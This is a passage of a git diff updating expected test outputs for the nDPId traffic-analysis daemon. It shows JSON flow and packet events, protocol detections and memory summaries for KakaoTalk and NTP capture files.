00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069141261,"flow_last_seen":1430069141741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01155{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1430069163715,"flow_last_seen":1430069216555,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7008,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01155{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1430069163715,"flow_last_seen":1430069216555,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7008,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7580000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069140120,"flow_last_seen":1430069164894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069140120,"flow_last_seen":1430069164894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01155{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1430069164966,"flow_last_seen":1430069216555,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7778,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} +01155{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1430069164966,"flow_last_seen":1430069216555,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":7778,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069211640,"flow_last_seen":1430069211843,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1503,"flow_first_seen":1430069171118,"flow_last_seen":1430069216536,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":134109,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11320,"dst_port":23044,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1430069170892,"flow_last_seen":1430069214736,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":2116,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069211640,"flow_last_seen":1430069211843,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25223,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1503,"flow_first_seen":1430069171118,"flow_last_seen":1430069216536,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":134109,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11320,"dst_port":23044,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1430069170892,"flow_last_seen":1430069214736,"flow_idle_time":200000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":2116,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} 00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069164656,"flow_last_seen":1430069216559,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069164656,"flow_last_seen":1430069216559,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1430069216559,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00575{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3203,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","packets-captured":3203,"packets-processed":3203,"total-skipped-flows":0,"total-l4-payload-len":291404,"total-not-detected-flows":0,"total-guessed-flows":9,"total-detected-flows":11,"total-detection-updates":4,"total-updates":0,"current-active-flows":0,"total-active-flows":20,"total-idle-flows":20,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":115,"global_ts_msec":1430069216559} @@ -121,9 +121,9 @@ ~~ total active/idle flows...: 20/20 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6009613 bytes -~~ total memory freed........: 6009613 bytes -~~ total allocations/frees...: 121420/121420 +~~ total memory allocated....: 6143247 bytes +~~ total memory freed........: 6143247 bytes +~~ total allocations/frees...: 124182/124182 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 1502 chars diff --git a/test/results/NTPv2.pcap.out b/test/results/NTPv2.pcap.out index c2b7a6aa5..4b8708c1f 100644 --- a/test/results/NTPv2.pcap.out +++ b/test/results/NTPv2.pcap.out @@ -2,8 +2,8 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1436865383632} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865383632,"flow_last_seen":1436865383632,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":368,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":368,"midstream":0,"thread_ts_msec":1436865383632,"l3_proto":"ip4","src_ip":"208.104.95.10","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00924{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1436865383632,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":410,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":410,"pkt_l4_len":376,"thread_ts_msec":1436865383632,"pkt":"RIpbLCrSACaIdf8bCABFAAGMHS4AADERoZDQaF8KTi5MAgB7AFABeH6Xlw4DKgAFAEgAAAAAAAAQOgAAAAAAAAGISO9ZbawQDGUAAAABDAIHAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAQZwAAAAAAAADHQLufDawQDGUAAAABuxwHAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQxAAAAAAAAAa6UEgp0qwQDGUAAAABKtoHAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ2AAAAAAAAAWzX1q4C6wQDGUAAAABAFAHAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ2wAAAAAAAAWRR3um9qwQDGUAAAABAFAHAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865383632,"flow_last_seen":1436865383632,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":368,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":368,"midstream":0,"thread_ts_msec":1436865383632,"l3_proto":"ip4","src_ip":"208.104.95.10","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":42,"version":42}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436865383632,"flow_last_seen":1436865383632,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":368,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":368,"midstream":0,"thread_ts_msec":1436865383632,"l3_proto":"ip4","src_ip":"208.104.95.10","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865383632,"flow_last_seen":1436865383632,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":368,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":368,"midstream":0,"thread_ts_msec":1436865383632,"l3_proto":"ip4","src_ip":"208.104.95.10","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":42,"version":42}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436865383632,"flow_last_seen":1436865383632,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":368,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":368,"midstream":0,"thread_ts_msec":1436865383632,"l3_proto":"ip4","src_ip":"208.104.95.10","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"NTPv2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":368,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1436865383632} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869472 bytes -~~ total memory freed........: 5869472 bytes -~~ total allocations/frees...: 118115/118115 +~~ total memory allocated....: 6003106 bytes +~~ total memory freed........: 6003106 bytes +~~ total allocations/frees...: 120877/120877 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 929 chars diff --git a/test/results/NTPv3.pcap.out b/test/results/NTPv3.pcap.out index 9c0f9b70a..cfa566c2b 100644 --- a/test/results/NTPv3.pcap.out +++ b/test/results/NTPv3.pcap.out @@ -2,8 +2,8 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1436865405371} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865405371,"flow_last_seen":1436865405371,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1436865405371,"l3_proto":"ip4","src_ip":"175.144.140.29","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1436865405371,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1436865405371,"pkt":"RIpbLCrSACaIdf8bCABFAABMAABAADcRbcOvkIwdTi5MAgB7AFAAOLcYHAAE+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADZT08RAAAAANlPTxEAAAAA"} -00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865405371,"flow_last_seen":1436865405371,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1436865405371,"l3_proto":"ip4","src_ip":"175.144.140.29","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} -00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436865405371,"flow_last_seen":1436865405371,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1436865405371,"l3_proto":"ip4","src_ip":"175.144.140.29","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} +00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436865405371,"flow_last_seen":1436865405371,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1436865405371,"l3_proto":"ip4","src_ip":"175.144.140.29","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} +00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436865405371,"flow_last_seen":1436865405371,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1436865405371,"l3_proto":"ip4","src_ip":"175.144.140.29","dst_ip":"78.46.76.2","src_port":123,"dst_port":80,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 00548{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"NTPv3.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":48,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1436865405371} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869472 bytes -~~ total memory freed........: 5869472 bytes -~~ total allocations/frees...: 118115/118115 +~~ total memory allocated....: 6003106 bytes +~~ total memory freed........: 6003106 bytes +~~ total allocations/frees...: 120877/120877 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 673 chars diff --git a/test/results/NTPv4.pcap.out b/test/results/NTPv4.pcap.out index 300e0f594..f826deeec 100644 --- a/test/results/NTPv4.pcap.out +++ b/test/results/NTPv4.pcap.out @@ -2,8 +2,8 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1436865396190} 